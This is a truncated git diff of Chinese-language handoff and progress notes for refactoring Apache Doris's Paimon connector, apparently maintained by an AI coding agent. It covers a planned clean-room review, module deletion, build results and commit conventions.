clean-room 也是「待验证历史声明」非事实)。orchestrator 读本 HANDOFF **仅为流程定向**,不把任何历史结论作为 review 输入。**当作第一次看这套代码,从零独立判断对错与 parity。与既往「Phase C 交叉核对历史结论」相反,本轮刻意不做。** + +**对照基线(legacy / 原先逻辑)= 同时也是 B8 的删除目标**:fe-core `.../datasource/paimon/*` + +`.../datasource/property/storage/{OSS,COS,OBS,S3,Minio}Properties` + `.../property/metastore/HMSBaseProperties` 等 +(+ 必要时 git 历史里 paimon 迁移前实现)。**故 review 必须先于 B8**(删了就没了对照基线)。仅读其**代码**、不读其历史结论 / commit message 里的判断。 + +**产物**:review 报告落 `plan-doc/reviews/`(每维度 finding 分级 BLOCKER/MAJOR/MINOR/NIT + 与 legacy 差异清单[有意偏离 vs 回归] + 处置建议)。**先 review、不改代码**;发现的修复各自另起 task(AGENT-PLAYBOOK 单任务循环)。 --- -# 📦 仓库状态 -- **HEAD = `f0210b51871`(FIX-4)**。迁移链:…→`c376aba1264`(FIX-1)→`2e845e88bf9`(FIX-2)→`f08bc22b9bd`(FIX-3) - →`d4aeaaccc45`(docs)→**`f0210b51871`(FIX-4, HEAD)**。本 session 后另有一个 `docs:` 提 - (滚 HANDOFF + task-list 勾 FIX-4 + 加 `FIX-FECONF-STORAGE-PARITY-summary.md`)。 -- ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** —— commit 前继续 +# 🔭 review 之后的主线 backlog(review 出报告后再排) + +1. **B8 legacy 删除**([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md) Follow-ups + 第三轮报告 R-1…R-8):删 fe-core + `datasource/paimon/*` + legacy `{OSS,COS,OBS,S3,Minio}Properties` / `HMSBaseProperties` 等 dead residue。 + **删除前提**:①上面的 review 完成(对照基线用完)②FIX-4 已 commit(literal 复刻对照完成)。**须保 load-bearing + dispatch ordering**(`ShowPartitionsCommand:478-480`,R-4)。逐子树删 + 每批跑 fe-core 编译 + 连接器测 + regression-gated。 + **⚠️ 跨线 tension**:元存储子线 D-016 记「fe-core `datasource.property.{storage,metastore}` 两包仍服务 + hive/hudi/iceberg、不碰」;B8 想删其中 paimon-only 部分——**B8 scope 须先经 review dim-6(残留旧逻辑/fallback)确认 + 哪些真 dead、哪些仍被 hive/hudi/iceberg 消费**,别误删在用类。 +2. **元存储子线收尾**([`metastore-storage-refactor/`](./metastore-storage-refactor/)):P2-T04(paimon pom + gate, + ⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg 显式 loader 防子优先 loader 下发现不到 provider)→ P2-T05(docker + 5-flavor 真闸 + vended(REST/DLF) + Kerberos HMS + storage 等价,合并原 P1-T06;`enablePaimonTest=true`)。 +3. **D-057 re-scope**(第三轮报告 §D.3):deferred `TablePartitionValues:162` prune-path sentinel residue **不影响 + paimon**(MVCC override 绕过)→ re-scope 到非-MVCC 插件连接器(maxcompute/es/jdbc)。 +4. **accepted-deviation 用户签字**(task-list「NOT in this fix scope」):~10 MINOR + ~12 NIT + C-1 observability + + uncheckedFallbacks(REFRESH cache invalidation / partitions-TVF auth / split-plan RPC 在 `executeAuthenticated` 外 / + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常)。逐条 accept-as-deviation 或转 fix。 + +--- + +# 📦 仓库 / 进度状态 +- **HEAD = `13d3876d25d`**(元存储子线 P1-T07:删 fe-property 孤儿模块)。当前分支 **`catalog-spi-07-paimon`**(非 master); + 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, + force-with-lease)。 +- **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 + (FIX-1 `c376aba1264` rest-vended-uri / FIX-2 `2e845e88bf9` jni-file-format / FIX-3 `f08bc22b9bd` incr-scan-reset / + FIX-4 `f0210b51871` feconf-storage-parity)。详见 `task-list-P5-rereview3-fixes.md` + `reviews/P5-paimon-rereview3-2026-06-12.md`。 +- **元存储/storage 子线**(独立目录,本 session 推进):storage 收口到 `fe-filesystem-api` typed(P1)+ 新建 + `fe-connector-metastore-{api,spi}` + `fe-kerberos`(P2-T01..T03,paimon 已 cutover 到共享 metastore SPI)+ + **fe-property 模块已物理删除**(P1-T07,0 消费者孤儿)。剩 P2-T04/T05(见 backlog)。**注**:fe-core + `datasource.property.{storage,metastore}` 两包仍在(子线 D-016 不碰;B8 才考虑删其 paimon-only 部分)。 +- ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** → commit 前继续 path-whitelist,**严禁 `git add -A`**;`regression-conf.groovy.bak` 同理排除。 -- 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`); - `plan-doc/reviews/P5-paimon-rereview3-2026-06-12.md`(第三轮 review 报告,未跟踪——大文件,下次方便时 - vet+commit 或保留本地)。 -- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**P0~P4 无阻塞;P9-1/P7-1/P2-1 + P8/P9-config 全清。** - round-3 的 4 个 user-approved fix 全部完成。 +- 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`);`reviews/P5-paimon-rereview3-2026-06-12.md` + (第三轮 review 报告,未跟踪——大文件,下次方便时 vet+commit 或保留本地)。 + +## 🗺️ 代码脚手架 +- **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` + (`PaimonConnector` / `PaimonConnectorProvider` / 存储+HiveConf 装配 `PaimonCatalogFactory`[现 cutover 到 + `MetaStoreProviders.bind` + 薄 `assembleHiveConf`] / scan `PaimonScanPlanProvider` / @incr `PaimonIncrementalScanParams`)。 +- **共享 SPI / 叶子**:`fe/fe-connector/fe-connector-{api,spi}/` + `fe-connector-metastore-{api,spi}/`(metastore 解析器 + + `MetaStoreProvider` SPI/ServiceLoader)+ 顶层叶子 `fe/fe-kerberos/`(kerberos facts)+ `fe/fe-filesystem/`(typed + storage,含 `-hdfs` BE model)。 +- **fe-core 桥**:`fe/fe-core/.../connector/DefaultConnectorContext.java`、`.../datasource/PluginDriven*.java`、 + `.../fs/FileSystem{Factory,PluginManager}.java`;nereids scan-node 分发。 +- **Legacy 对照基准(= review 对照 + B8 删除目标)**:fe-core `.../datasource/paimon/`、 + `.../datasource/property/storage/` 下 `{OSS,COS,OBS,S3,Minio}Properties`、`.../property/metastore/HMSBaseProperties`。 +- **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`、`paimon_reader.cpp`、`partition_column_filler.h`)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** -- 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 +- 每个 fix 独立 commit;message = `fix: ` / `[Pn-Tnn] ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。fix commit 带其 design doc(repo 惯例)。 +- **收尾推送惯例**(见 memory `catalog-spi-07-paimon-branch-pr-workflow`):push `catalog-spi-07-paimon`(ff) + + **force-with-lease** `master-catalog-spi-07-paimon`(PR #64445 head)+ 在 PR #64445 评论 `run buildall`。⚠️ 两分支 + 历史曾发散;force 前先 fetch 对比、用 `--force-with-lease`。⚠️ remote URL 明文嵌 GitHub PAT(`git remote -v` 会打印)。 ## ⚙️ 操作须知(复用) - maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false - -DfailIfNoTests=false`;验证读 surefire XML + `BUILD SUCCESS`/`MVN_EXIT`([[doris-build-verify-gotchas]])。 - **漏 `-am` → `could not resolve fe-connector-spi ${revision}` 假错**。改 fe-core `-pl :fe-core -am`;SPI - `-pl :fe-connector-api`/`:fe-connector-spi -am`。**checkstyle**:连接器 - `mvn -f …/fe/pom.xml -pl :fe-connector-paimon -am checkstyle:check`。**checkstyle 在 `validate` phase 跑(编译前)**—— - 多行数组初始化 `{` 须留在 `=` 同行(见 FIX-4),否则 'array initialization lcurly' indentation 报错。 + -DfailIfNoTests=false`;验证读 surefire XML + `BUILD SUCCESS`(memory `doris-build-verify-gotchas`)。**漏 `-am` → + `could not resolve … ${revision}` 假错**。paimon 模块需 `-am package -Dassembly.skipAssembly=true`(shade jar 携带 + HiveConf)。**checkstyle 在 `validate` phase(编译前)跑**。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试 harness:`PaimonCatalogFactoryTest`(纯 Map→Configuration/HiveConf,56 测)/`PaimonScanPlanProviderTest` - (real-table `FileSystemCatalog`)/`PaimonIncrementalScanParamsTest`/`RecordingConnectorContext`/ - `RecordingPaimonCatalogOps`/`FakePaimonTable`(`.copy` 是 no-op recorder,reset/merge fail-before 须 real - table)/`DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated(`enablePaimonTest` 默认 false)→ - 注明 gated,勿谎称跑过。 +- 测试 harness:`PaimonCatalogFactoryTest`(纯 Map→Configuration/HiveConf)/`PaimonScanPlanProviderTest`(real-table + `FileSystemCatalog`)/`PaimonIncrementalScanParamsTest`/`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/ + `FakePaimonTable`(`.copy` 是 no-op recorder,reset/merge fail-before 须 real table)/ metastore-spi 的 + `*MetaStorePropertiesTest` / `DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated + (`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **B8 是大动作**:开工前 `AskUserQuestion` 定 scope(删哪个子树 / follow-ups 哪几条先做)。逐子树删 + 每批跑 - fe-core 编译 + 连接器测 + regression-gated;**保 load-bearing dispatch ordering**(grep 全调用方,base vs MVCC - 子类)。 -- **改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)**;改 storage/auth 装配流必 - grep `applyStorageConfig` 全 caller(filesystem/jdbc/hms/dlf)+ 注意 raw `hadoop.*`/`fs.*` passthrough 跑在最后 - (last-write-wins)会 clobber 之前的 authoritative 设置(FIX-4 4d/4e 亲证)。 -- **design red-team(写码前)+ impl verification(写码后)两道**本 session 各抓真 defect,**勿跳**。 -- **fail-before 闸要真验**:钉「旧 ordering 会 RED」的测试(username-priority / kerberos-survives-simple-HDFS)。 -- **历史不压制新发现**;完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`。 +- **本轮是 review、不是改码**:先出 review 报告,发现项各自另起 fix task;**review 须 clean-room、零历史先验**(见上「关键约束」)。 +- **review 必须先于 B8**(legacy = 对照基线);B8 scope 须经 review dim-6 确认真 dead(别误删仍被 hive/hudi/iceberg 消费的类)。 +- **改 handle/分区/scan/storage/auth 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)**;storage/auth 装配注意 raw + `hadoop.*`/`fs.*` passthrough 跑最后会 clobber 之前 authoritative 设置(FIX-4 4d/4e 亲证)。 +- **design red-team(写码前)+ impl verification(写码后)两道**历史证有效(修复阶段照用,但 review 阶段保持 clean-room)。 +- **元存储子线**细节不在本文件——读 `metastore-storage-refactor/HANDOFF.md`。 diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 183c5981ffae00..f54ddc2187d1f4 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,11 +7,11 @@ --- -**更新时间**:2026-06-18(实现 session:**P1-T07 ✅ 彻底删除 fe-property 孤儿模块**[commit 待提交,D-016 授权超 D-005];全 FE reactor `test-compile` BUILD SUCCESS(fe-core 实编译,0 ERROR)= 证 module+dependencyManagement 删除无隐藏 transitive 消费者。**下一步 = P2-T04**[pom+gate,⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg] → P2-T05 docker 真闸) +**更新时间**:2026-06-18(实现 session:**P1-T07 ✅ 彻底删除 fe-property 孤儿模块**[commit `13d3876d25d`,D-016 授权超 D-005],已 push 到 `catalog-spi-07-paimon`(fast-forward) + `master-catalog-spi-07-paimon`(force-with-lease,PR #64445 head) + 在 PR #64445 评论 `run buildall`;全 FE reactor `test-compile` BUILD SUCCESS(fe-core 实编译,0 ERROR)= 证删除无隐藏 transitive 消费者。**下一步 = 主线全连接器 clean-room review**[已提升到主线,见 `../HANDOFF.md`;审整条 paimon connector];**本子线自身剩余 = P2-T04 → P2-T05 docker 真闸**,排在主线 review 之后) **更新人**:Claude(Opus 4.8) > **本 session 进度补注(最新在最前)**: -> - **P1-T07 ✅(commit 待提交,D-016)**:彻底删除 fe-property 孤儿模块(**覆盖 D-005「不删 fe-property」条款**;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。执行前按强制流程复核(读全套文档 + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消);`fe/pom.xml` 删 `fe-property` + dependencyManagement 条目;5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`——保历史语义非改逻辑)。**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05 模式):whole-repo `grep fe-property`(排 plan-doc)=**0**、`grep org.apache.doris.property`=**0**;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min);paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。⚠️ **docker e2e 未跑**(D-012,留 P2-T05)。 +> - **P1-T07 ✅(commit `13d3876d25d`,已 push `catalog-spi-07-paimon`+`master-catalog-spi-07-paimon`,PR #64445 评论 `run buildall`,D-016)**:彻底删除 fe-property 孤儿模块(**覆盖 D-005「不删 fe-property」条款**;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。执行前按强制流程复核(读全套文档 + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消);`fe/pom.xml` 删 `fe-property` + dependencyManagement 条目;5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`——保历史语义非改逻辑)。**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05 模式):whole-repo `grep fe-property`(排 plan-doc)=**0**、`grep org.apache.doris.property`=**0**;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min);paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。⚠️ **docker e2e 未跑**(D-012,留 P2-T05)。 > - **决策**:无新决策(D-016 已预定本任务);唯一边界 = AskUserQuestion「5 处注释一并清理」(保历史语义、白名单内)。 > > **更早本 session(P2-T01..T03,已完成)**: @@ -65,10 +65,14 @@ - **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03)。**fe-property 已物理删除**(P1-T07 ✅,0 消费者孤儿移除;fe-core `datasource.property.{storage,metastore}` 两包仍在、仍服务 hive/hudi/iceberg)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 - ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):**P2-T04 paimon pom + gate 核对**(含 ⚠️ MetaStoreProviders ServiceLoader 2-arg 修),然后 P2-T05 docker 真闸 -> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 + 一句话复述。** +## 下一步(明确):**主线全连接器 clean-room review(已提升到主线,见 [`../HANDOFF.md`](../HANDOFF.md))**;本子线自身剩余 = P2-T04 → P2-T05(主线 review 之后) +> **务必先按顶部流程读全套文档做流程定向;本子线实施前 WORKFLOW §2 单任务 + 一句话复述。** -**P2-T04(paimon pom + gate 核对)— 下一步**: +**RV-T01(paimon connector 全功能路径 clean-room 对抗 review)— 已提升到主线**: +- 用户 2026-06-18 定的「paimon connector 全功能路径 6 维度(读取 / 写入 / DDL / 元数据回放 / 元数据 cache / 残留旧逻辑·fallback)clean-room 对抗 review,**⚠️ 不注入开发历史先验**」审的是**整条 paimon connector**(= catalog-spi **主线**范围,非 metastore/storage 子线),故归 **主线** [`../HANDOFF.md`](../HANDOFF.md)「下一个 session 的任务」,**本子目录不再复述其 spec**(避免在 metastore 子目录里放全连接器 review 的 scope 错配)。 +- 与本子线的关系:该 review **先于** B8 legacy 删除(legacy = 对照基线);**本子线自身的剩余工作 = P2-T04 → P2-T05**,排在主线 review 之后。 + +**P2-T04(paimon pom + gate 核对)— 主线 review 之后**: - **做什么**:核 `fe-connector-paimon/pom.xml` 依赖集 = `fe-connector-{api,spi}` + `fe-connector-metastore-spi`(transitively 带 metastore-api + fe-kerberos)+ `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hadoop/aws/…;`tools/check-connector-imports.sh` PASS(P2-T03 已验 exit 0,复核即可)。 - **⚠️ P2-T03 recon 揪出的真正 substance(不只是 packaging 复核——可能要 1 行改 metastore-spi,白名单内)**:`MetaStoreProviders.load()` 用 **1-arg `ServiceLoader.load(MetaStoreProvider.class)`(TCCL-based)**;static `PROVIDERS` 在首次 `bind()`(= `validateProperties` 在 CREATE CATALOG)初始化,而该路径**不 pin TCCL 到插件 loader**(仅 `createCatalogFromContext` pin)。metastore-spi 在插件 zip **child-first lib/**(assembly 已确认 bundle、不在 excludes),**不在 fe-core classpath**。若 class-init 时 TCCL≠插件 loader → ServiceLoader 找不到 child-first 的 `META-INF/services` → **0 provider → `bind` 抛「No MetaStoreProvider supports」→ 所有 paimon CREATE/读 挂**。UT(单 flat loader)结构上抓不到。**建议 fix**:改 **2-arg `ServiceLoader.load(MetaStoreProvider.class, MetaStoreProviders.class.getClassLoader())`**(用模块自身 loader 发现,与 TCCL 无关;对标 `FileSystemPluginManager:99` 对插件 provider 用显式 loader)。执行前先读 fe-core 插件调用路确认 TCCL 是否被 pin,但 2-arg 形式无论如何更稳。 - **依赖**:P1-T07, P2-T03 ✅。设计 §4 P2-4。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index b746252c41fed6..65ae32bf62fd09 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -12,13 +12,13 @@ | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | | **Implement(实现)** | █████████░ ~75% | 🚧 **进行中**(P0 ✅;P1 6/7 = **P1-T07 ✅** + P1-T06 推迟[D-012];**P2 3/5 = P2-T01+P2-T02+P2-T03 ✅**;P3a facts 切片 ✅) | -任务计数:**12 / 15** 完成(P0: 2/2 ✅ | P1: 6/7,**P1-T07 ✅** + **P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T04**(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg 显式 loader)→ **P2-T05** docker 真闸。 +任务计数:**12 / 15** 完成(P0: 2/2 ✅ | P1: 6/7,**P1-T07 ✅** + **P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = 主线全连接器 clean-room review**(已提升到主线,见 [`../HANDOFF.md`](../HANDOFF.md);审整条 paimon connector);**本子线自身剩余 = P2-T04**(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg)→ **P2-T05** docker 真闸,排在主线 review 之后。 --- ## 当前活跃 task -- **P1-T07 ✅ 完成(2026-06-18,commit 待提交,D-016)**:彻底删除 fe-property 孤儿模块(超 D-005「不删 fe-property」条款;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。删 `fe/fe-property/`(27 文件 + stale `target/`→目录全消)+ `fe/pom.xml` 两声明(`` + dependencyManagement 条目)+ 清 5 处 stale 注释(一并清理,用户 AskUserQuestion 选;paimon×3 + hdfs×2,「fe-property」→「legacy」保历史语义)。**RED/GREEN=构建闸**:whole-repo `grep fe-property`(排 plan-doc)/`grep org.apache.doris.property` 双归零;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 0 ERROR)+ paimon 全模块 **278/0/1skip** + fe-filesystem-hdfs **78/0/0** + checkstyle 0 + import-gate exit 0 + 白名单干净。⚠️ docker e2e 未跑(D-012)。 -- **下一步 = P2-T04(paimon pom + gate 核对)**:核 `fe-connector-paimon/pom.xml` 依赖集;`tools/check-connector-imports.sh` PASS(P2-T03 已 exit 0,复核即可)。**⚠️ P2-T03 recon 揪出的真 substance(可能 1 行改 metastore-spi,白名单内)**:`MetaStoreProviders.load()` 用 1-arg `ServiceLoader.load(MetaStoreProvider.class)`(TCCL-based),static PROVIDERS 在首次 `bind()`(CREATE CATALOG 的 `validateProperties`)初始化,而该路径**不 pin TCCL 到插件 loader**(仅 `createCatalogFromContext` pin)→子优先插件 zip 下若 TCCL≠插件 loader→0 provider→所有 paimon CREATE/读挂(UT 单 flat loader 抓不到)。**建议改 2-arg `ServiceLoader.load(MetaStoreProvider.class, MetaStoreProviders.class.getClassLoader())`**(对标 `FileSystemPluginManager:99`)。然后 **P2-T05** docker 真闸。 +- **P1-T07 ✅ 完成(2026-06-18,commit `13d3876d25d`,已 push `catalog-spi-07-paimon`+`master-catalog-spi-07-paimon` + PR #64445 评论 `run buildall`,D-016)**:彻底删除 fe-property 孤儿模块(超 D-005「不删 fe-property」条款;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。删 `fe/fe-property/`(27 文件 + stale `target/`→目录全消)+ `fe/pom.xml` 两声明(`` + dependencyManagement 条目)+ 清 5 处 stale 注释(一并清理,用户 AskUserQuestion 选;paimon×3 + hdfs×2,「fe-property」→「legacy」保历史语义)。**RED/GREEN=构建闸**:whole-repo `grep fe-property`(排 plan-doc)/`grep org.apache.doris.property` 双归零;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 0 ERROR)+ paimon 全模块 **278/0/1skip** + fe-filesystem-hdfs **78/0/0** + checkstyle 0 + import-gate exit 0 + 白名单干净。⚠️ docker e2e 未跑(D-012)。 +- **下一步 = 主线全连接器 clean-room review(已提升到主线)**:用户 2026-06-18 定的 paimon connector 全功能路径 6 维度(读取/写入/DDL/元数据回放/元数据 cache/残留旧逻辑·fallback)clean-room 对抗 review(**⚠️ 不注入开发历史先验**)审的是整条 connector = catalog-spi **主线**范围,归 [`../HANDOFF.md`](../HANDOFF.md)「下一个 session 的任务」,本子目录不复述 spec。该 review **先于 B8**(legacy = 对照基线)。**本子线自身剩余 = P2-T04**(pom+gate,⚠️ `MetaStoreProviders` ServiceLoader 改 2-arg 显式 loader)→ **P2-T05** docker 真闸,排在主线 review 之后。 - **P2-T03 ✅ 完成(2026-06-18,commit `3c1e118dcfa`)**:paimon adapter cutover 到共享 metastore-spi(详见最近动态)。 - **FU-T02 ✅ + FU-T03 ✅ 完成(2026-06-18,D-011 授权)**:P1-T06 前的两项 fe-filesystem 对象存储补齐均完成(**R-008 + R-006 闭环**)。 - **FU-T02(R-008,commit `e5b088b14e7`)**:`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`——ak/sk 皆空→`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略。**DV-005**:不加字段/枚举(legacy OSS/COS/OBS 本无可配置 provider type,且 `S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖)。TDD RED(`expected but was `)→GREEN;OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 @@ -43,7 +43,9 @@ --- ## 最近动态(最近 7 天) -- 2026-06-18 **P1-T07 ✅(彻底删除 fe-property 孤儿模块,commit 待提交,D-016)**:执行 session 先按强制流程复核(读 PROGRESS/HANDOFF/WORKFLOW/tasks/decisions + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消)+ `fe/pom.xml` 删 `fe-property` + dependencyManagement 条目 + 5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`,保历史语义非改逻辑)。**RED/GREEN=构建闸**(无 UT 可写,同 P1-T05):whole-repo `grep fe-property`(排 plan-doc)=0、`grep org.apache.doris.property`=0;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min)=证 module+dependencyManagement 删除无隐藏 transitive 消费者;paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。**fe-property 物理删除完成(0 消费者孤儿移除);fe-core 两包不碰。** ⚠️ docker e2e 未跑(D-012,留 P2-T05)。**下一步 P2-T04**。 +- 2026-06-18 **RV-T01(全连接器 clean-room review)提升到主线**:用户明确 `metastore-storage-refactor/` 是 metastore-refactor 专属子目录,全连接器 review 属 catalog-spi **主线**→ RV-T01 spec 移到主线 [`../HANDOFF.md`](../HANDOFF.md)(6 维度 + **不注入开发历史先验**),先于 B8 legacy 删除(legacy=对照基线)。本子目录只留指针;本子线自身剩余 = P2-T04/T05(主线 review 后)。**仅文档更新。** +- 2026-06-18 **RV-T01 初排(已被上一条提升到主线取代)**:原把 paimon connector 全功能路径 clean-room 对抗 review(6 维度,不注入先验)排为本子线下一步——后经用户澄清移到主线(见上)。 +- 2026-06-18 **P1-T07 ✅(彻底删除 fe-property 孤儿模块,commit `13d3876d25d`,已 push `catalog-spi-07-paimon`+`master-catalog-spi-07-paimon` + PR #64445 评论 `run buildall`,D-016)**:执行 session 先按强制流程复核(读 PROGRESS/HANDOFF/WORKFLOW/tasks/decisions + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消)+ `fe/pom.xml` 删 `fe-property` + dependencyManagement 条目 + 5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`,保历史语义非改逻辑)。**RED/GREEN=构建闸**(无 UT 可写,同 P1-T05):whole-repo `grep fe-property`(排 plan-doc)=0、`grep org.apache.doris.property`=0;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min)=证 module+dependencyManagement 删除无隐藏 transitive 消费者;paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。**fe-property 物理删除完成(0 消费者孤儿移除);fe-core 两包不碰。** ⚠️ docker e2e 未跑(D-012,留 P2-T05)。**下一步 P2-T04**。 - 2026-06-18 **D-016 + P1-T07 新增(用户定下一阶段=彻底删除 fe-property)**:用户授权物理删除已 0 消费者的 fe-property 孤儿模块,**超 D-005「不删 fe-property」条款**(fe-core `datasource.property.{storage,metastore}` 两包不变,仍服务 hive/hudi/iceberg)。whole-repo recon:仅 `fe/pom.xml`(module+depMgmt 真引用)+ 5 处 stale 注释、`org.apache.doris.property` import=0、无 BE/docker/脚本/regression 引用→删除限 `fe/`。新增 **P1-T07**(删目录+fe/pom.xml 两声明+可选清注释,RED/GREEN=构建闸),WORKFLOW §4.1 白名单把 `fe/fe-property/**` 移入允许删除区,HANDOFF「下一步」改为 P1-T07(先于 P2-T04/T05)。**仅文档更新,未删代码**(执行留下一 session)。 - 2026-06-18 **P2-T03 ✅(paimon adapter cutover 到共享 metastore-spi,commit 